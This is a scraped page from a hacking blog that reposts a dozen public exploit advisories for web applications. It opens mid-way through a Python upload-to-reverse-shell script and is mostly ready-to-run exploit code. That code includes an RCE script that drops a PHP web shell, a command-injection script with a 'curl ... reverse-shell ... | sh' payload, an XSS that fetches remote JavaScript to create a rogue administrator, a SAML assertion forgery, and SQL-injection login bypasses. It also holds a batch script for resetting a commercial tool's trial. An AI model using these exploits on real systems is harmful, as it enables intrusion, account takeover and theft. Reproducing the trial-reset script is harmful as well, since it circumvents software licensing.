sollicitudin risus. Aliquam iaculis tristique nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae nisi. Curabitur at quam ut libero convallis mattis vel eget mauris. Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum non magna at, molestie gravida magna. Aenean neque sapien, volutpat a ullamcorper nec, iaculis quis est.</p>\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489--\r\n" requests.post(url, headers=headers, cookies=cookies, data=data) print('[+]Success!') print('[+]Getting reverse shell') time.sleep(2) def RCE(): path = 'http://'+site+'/vehicle_service/uploads/' html_text = requests.get(path).text soup = BeautifulSoup(html_text, 'html.parser') for link in soup.find_all('a'): data = link.get('href') if ".php" in data: r = requests.get('http://'+site+'/vehicle_service/uploads/'+data) print('[+]Pwned!') LoginAndShellUpload() RCE()
  14. HireHackking

    Phpwcms 1.9.30 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload # Date: 30/9/2021 # Exploit Author: Okan Kurtulus | okankurtulus.com.tr # Software Link: http://www.phpwcms.org/ # Version: 1.9.30 # Tested on: Ubuntu 16.04 Steps: 1-) You need to login to the system. http://target.com/phpwcms/login.php 2-) Creating payload with SVG extension: payload.svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("XSS!"); </script> </svg> 3-) Go to the following link and upload the payload: http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8 From the menu: file -> multiple file upload -> Select files or drop here 4-) After uploading payload, call it from the link below. http://192.168.1.112/phpwcms/upload/
  15. HireHackking

    Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping # Date: 09/07/2021 # Exploit Author: Cristian 'void' Giustini # Vendor Homepage: https://www.miniorange.com/ # Software Link: https://www.drupal.org/project/miniorange_saml # Version: 8.x-2.22 (REQUIRED) # Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38) # Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/ # Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036 --- The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML Signature Wrapping Attacks that could allows an attacker to perform privilege escalation attacks. In order to exploit the vulnerability, the plugin must be configured with the "Either SAML reponse or SAML assertion must be signed" options enabled and an empty "x509 certificate". Administrator point of view: - Install a Drupal version (for the PoC the version 9.1.10 has been used) - Configure an external SSO system like Auth0 - Configure the plugin with the Auth0 provider by checking the "Either SAML response or SAML assertion must be signed" and empty "x509 certificate" Attacker point of view: - Register a normal user on the website - Perform a login - Intercept the request with Burp Suite and decode the SAMLResponse parameter - Inject an additional <Saml:Assertion> object before the original one (example here: https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) (SAMLRaider Burp extension, XSW3 payload) <saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z"> <saml:AudienceRestriction> <saml:Audience>http://localhost:8080</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion> - Replace the username with one with higher privileges (like admin) - Submit the request - Successful exploitation
  16. HireHackking

    CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated) # Date: 01-10-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.cmsimple-xh.org/ # Software Link: https://www.cmsimple-xh.org/?Downloads # Version: 1.7.4 # Category: Webapps # Tested on: Linux/Windows # CMSimple_XH is an open source project under GPL3 license # Includes an endpoint that allows remote access # Backup page is misconfigured, causing security vulnerability # User information with sufficient permissions is required. # Example: python3 exploit.py -u http://example.com -p Admin123 from bs4 import BeautifulSoup from time import sleep import requests import argparse def main(): parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") host(args) def host(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print("\n[?] Check Adress...\n") sleep(2) args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass # Check Host Status try: response = requests.get(args.host) if response.status_code == 200: login(args) else: print("[-] Address not reachable!") sleep(2) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) def login(args): url = args.host + "/?&login" cookies = { "XH_2f": "evil" } headers = { "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/?&login" } data = { "login": "true", "keycut": args.password, "submit": "Login" } response = requests.post(url, headers=headers, cookies=cookies, data=data) token = response.cookies.get("XH_2f") soup = BeautifulSoup(response.text, 'html.parser') if (soup.find("link",{"rel":"next"})['href'] != "/"): print("[!] Login Success!\n") sleep(2) csrf(args,token) else: print("[!] Wrong password!!\n") sleep(2) def csrf(args, token): url = args.host + "/?file=content" cookies = { "status": "adm", "XH_2f": token } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/?&settings", "Accept-Encoding": "gzip, deflate", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies) try: soup = BeautifulSoup(response.text, 'html.parser') csrf = soup.find_all("input", type="hidden")[3].get("value") create(args, token, csrf) except Exception as e: print(e) else: pass def create(args, token, csrf): payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n" url = args.host cookies = { "status": "adm", "XH_2f": token } headers = { "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/?file=content&action=edit&xh_success=content", "Accept-Encoding": "gzip, deflate" } data = { "text": payload, "file": "content", "action": "save", "xh_csrf_token": csrf } response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True) if (response.status_code == 200): print("[!] Create Vuln File!\n") sleep(2) exploit(args) else: print("[!] Create Failed!\n") sleep(2) def exploit(args): print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()
  17. HireHackking

    Payara Micro Community 5.2021.6 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal # Date: 01/10/2021 # Exploit Author: Yasser Khan (N3T_hunt3r) # Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html # Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x # Version: Payara Micro Community 5.2021.6 # Tested on: Linux/Windows OS # CVE : CVE-2021-41381 https://nvd.nist.gov/vuln/detail/CVE-2021-41381 Proof of Concept: Step1: Open the browser check the version of the payara software Step2: Add this Path at end of the URL /.//WEB-INF/classes/META-INF/microprofile-config.properties Step3: Check the response with match containing "payara.security.openid.default.providerURI=" "payara.security.openid.sessionScopedConfiguration=true" Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability. Step5: Alternatively we can use CURL by using this command: Request: curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties Reference: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html https://nvd.nist.gov/vuln/detail/CVE-2021-41381
  18. HireHackking

    Directory Management System 1.0 - SQL Injection Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Directory Management System 1.0 - SQL Injection Authentication Bypass # Date: 2021-10-01 # Exploit Author: SUDONINJA # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/dfsms/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step 4 – Change the username to admin' or '1'='1 and password to dfsms Step 5 – Click forward and now you will be logged in as admin. POC POST /dms/admin/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 83 Origin: http://localhost Connection: close Referer: http://localhost/dms/admin/ Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl Upgrade-Insecure-Requests: 1 username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login
  19. HireHackking

    WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS) # Date: 09.17.2021 # Exploit Author: Andreas Finstad (4ndr34z) # Vendor Homepage: https://www.whatsupgold.com # Version: v.21.0.3, Build 188 # Tested on: Windows 2019 Server # CVE : CVE-2021-41318 # Reference: https://f20.be/cves/poc-cve-2021-41318 Description: Improper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks. Placing a XSS payload in one of the fields reflected onto the application, triggers the exploitation. No CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS. SNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload: # snmpd.conf # An example configuration file for configuring the Net-SNMP agent ('snmpd') # See snmpd.conf(5) man page for details ############################################################################ # SECTION: System Information Setup # syslocation: The [typically physical] location of the system. # Note that setting this value here means that when trying to # perform an snmp SET operation to the sysLocation.0 variable will make # the agent return the "notWritable" error code. IE, including # this token in the snmpd.conf file will disable write access to # the variable. # arguments: location_string sysName Evil-Device sysLocation Somewhere Over The Rainbow sysContact <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))> This is the base64 encoded string: var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a); x.js: var vhost = window.location.protocol+'\/\/'+window.location.host var username = "sysadmin" var password = "me" fetch(vhost+'/NmConsole/api/core/WebUser',{ method: 'POST', headers: { 'Content-Length': '479', 'Accept': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51', 'Content-Type': 'application/json', 'Origin': vhost, 'Referer': vhost+'/NmConsole/', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4', 'Connection': 'close' }, credentials: 'include', body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups" [1],"WebUserID":-1,"UserName":"'+username+'","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"'+password+'","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}' });
  20. HireHackking

    Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass # Date: 2021-09-30 # Exploit Author: sanjay singh # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/dfsms/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step 4 – Change the username to admin' or '1'='1 and password to dfsms Step 5 – Click forward and now you will be logged in as admin. POC POST /dfsms/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 57 Origin: http://localhost Connection: close Referer: http://localhost/dfsms/index.php Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl Upgrade-Insecure-Requests: 1 username=admin%27+or+%271%27%3D%271&password=dfsms&login=
  21. HireHackking

    Lodging Reservation Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass # Date: 2021-09-20 # Exploit Author: Nitin Sharma(vidvansh) # Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code # Version: v1.0 # Tested on: Windows 10 - XAMPP Server # Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. #Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. # PoC: POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+ # Authentication Bypass: # Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password => Username: ' or 1 -- - Password: ' or 1 -- -
  22. HireHackking

    Title: Navicat Premium 16.0.10 Cracked Installation

    HireHackking posted a blog entry in Hacker Technology
    Navicat Premium is a great database management tool. Connect this tool to a database where you can see detailed information for various databases. This includes reporting errors, etc. Of course, you can also log in to the database through it and perform various operations. Navicat Premium is a multi-link database management tool that allows you to connect to MySQL, SQLite, Oracle and PostgreSQL databases simultaneously in one program, making it easier to manage different types of databases. version Navicat Premium 16.0.10 Download Official website download address: https://www.navicat.com.cn/products/navicat-premium New Features in Navicat Premium 16 1. Chart Navicat 16 provides more data sources and chart support. We focus very much on improving usability and accessibility to provide vital information for your work. 2. Data generation Data generation helps you create a large amount of test data. Lets you create complex data in multiple tables that are associated with each other. 3. On-Prem Server has now been added to our Navicat series. We provide you with the option to host cloud environments to store Navicat objects internally where you are. 4. Connect to the configuration file Configure multiple connection profiles for outbound users, and connect settings can be switched according to the current location of the device used. 5. Productivity Navicat 16 has numerous features and UI/UX improvements to meet your database development needs. Provides you with new ways to build, manage and maintain databases. Installation Cracking Navicat 16.0.10 currently has no registration machine, but we can use the method of clearing the registry. to extend the probation period. Of course, you can also download the cracked version of other versions of 16.0.x. The script is as follows: @echo off echo Delete HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium\Registration[version and language] for /f %%i in (''REG QUERY 'HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium' /s | findstr /L Registration'') do ( reg delete %%i /va /f ) echo. echo Delete Info folder under HKEY_CURRENT_USER\Software\Classes\CLSID for /f %%i in (''REG QUERY 'HKEY_CURRENT_USER\Software\Classes\CLSID' /s | findstr /E Info'') do ( reg delete %%i /va /f ) echo. echo Finish pause so when Navicat expires, we double-click the script. You can play happily again.
  23. HireHackking

    Open Game Panel - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated) # Google Dork: intext:"Open Game Panel 2021" # Date: 08/14/2021 # Exploit Author: prey # Vendor Homepage: https://www.opengamepanel.org/ # Software Link: https://github.com/OpenGamePanel/OGP-Website # Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits) # Tested on: CentOS Linux 5.4.102 #Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command= betwen ';', the user needs to be authenticated for this. import requests banner = """ @ @ @@& @@@@@/ @ @& #@@@@@& .= ,/%@# @ @@@@@@@@@@@@@((%@@@@* @ #@@@@@@@@@@@@@@@*%@, @ @@@@@@@@@@@@@@&@@@@ @ &@@@@@@@@@/ &@@@. @ @@@@@@@@@( @ @@@@@@@@@@@@@&* @ &@@@@@@@@@@@@@@@@% @ ,&@@@@@@@@@@@@@ @ %@@@@@@@. @ .%@@@@@@@@% @@@@@@ @ @@@@@# .&@@@@# @ (@@@@@@@@@@@. .@@@& @@% @ .@@@@@, #@@@@@* #@@@ @@@@@ @ @@@& &@@@. @@@ @ ,@@@ @@@@@@ @ @@@ %@@@, @&@@ @@@, @@@@ @@@@ *@@@@@# @@ *@@ %@ @@@ @@ @@@@@/ @@@ @@@ ,@@@ ,@( .@= % *@/ @@ .@/ @(@ @@ @@@( @@ ,@( @@@* @#@@ @@(@ ,@( .@= % *@@@@@@ @@ @ &&.@( @@ @.@@ @@@@ @@.@(@ @@ (@. @@ ,@( .@= % *@/ %@(@ @@@ @@ *@@@ @@ @@ @@. @@ @@@@@@, ,@( .@= % *@/ @@* @@@ @@ %@@ @@@@@* @@ @@ &@ @@ ,@@@@@ .@= @@@@ ##You can get mod_id and home_id on your game panel URL when you are logged """ print(banner) target = input("Target url: (eg: https://panel.example.org)\n") opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n") mod_id = input("Mod_id value: (eg: 2437)\n") home_id = input("Home_id value: (eg: 3737)\n") server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n") command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n") url = target + "/home.php?m=gamemanager&p=game_monitor" cookies = {"opengamepanel_web": opengamepanel_web} headers = {"Content-Type": "application/x-www-form-urlencoded"} data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"} try: requests.post(url, headers=headers, cookies=cookies, data=data) except: print("Something went wrong, check your inputs or try manually exploiting the map parameter") print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")
  24. HireHackking

    Student Quarterly Grading System 1.0 - SQLi Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass # Date: 04.10.2021 # Exploit Author: Blackhan # Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code # Version: 1.0 # Tested on: Windows 10, Kali Linux # Student Quarterly Grading System v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce: 1 - Go to the login page http://localhost/grading_system/login.php 2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes and type anything to password field. 3 - Click on "Login" button and you are logged in as administrator. PoC POST /grading_system/Actions.php?a=login HTTP/1.1 Host: localhost Content-Length: 45 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/grading_system/login.php Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j Connection: close username=bypass'+or+1%3D1--+-&password=bypass
  25. HireHackking

    Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS) # Date: 2021-10-03 # Exploit Author: Jordan Glover # Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code # Version: v1.0 # Tested on: Windows 10 + XAMPP v3.3.0 Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability. Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script> Step 3 - Save the product. The stored XSS triggers for all users that navigate to the home page. POC POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743 Content-Length: 1203 Origin: http://localhost Connection: close Referer: http://localhost/bsenordering/admin/products/index.php?view=add Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="OWNERNAME" Test -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="OWNERPHONE" 0000000000 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="PRODESC" <script>alert(document.cookie)</script> 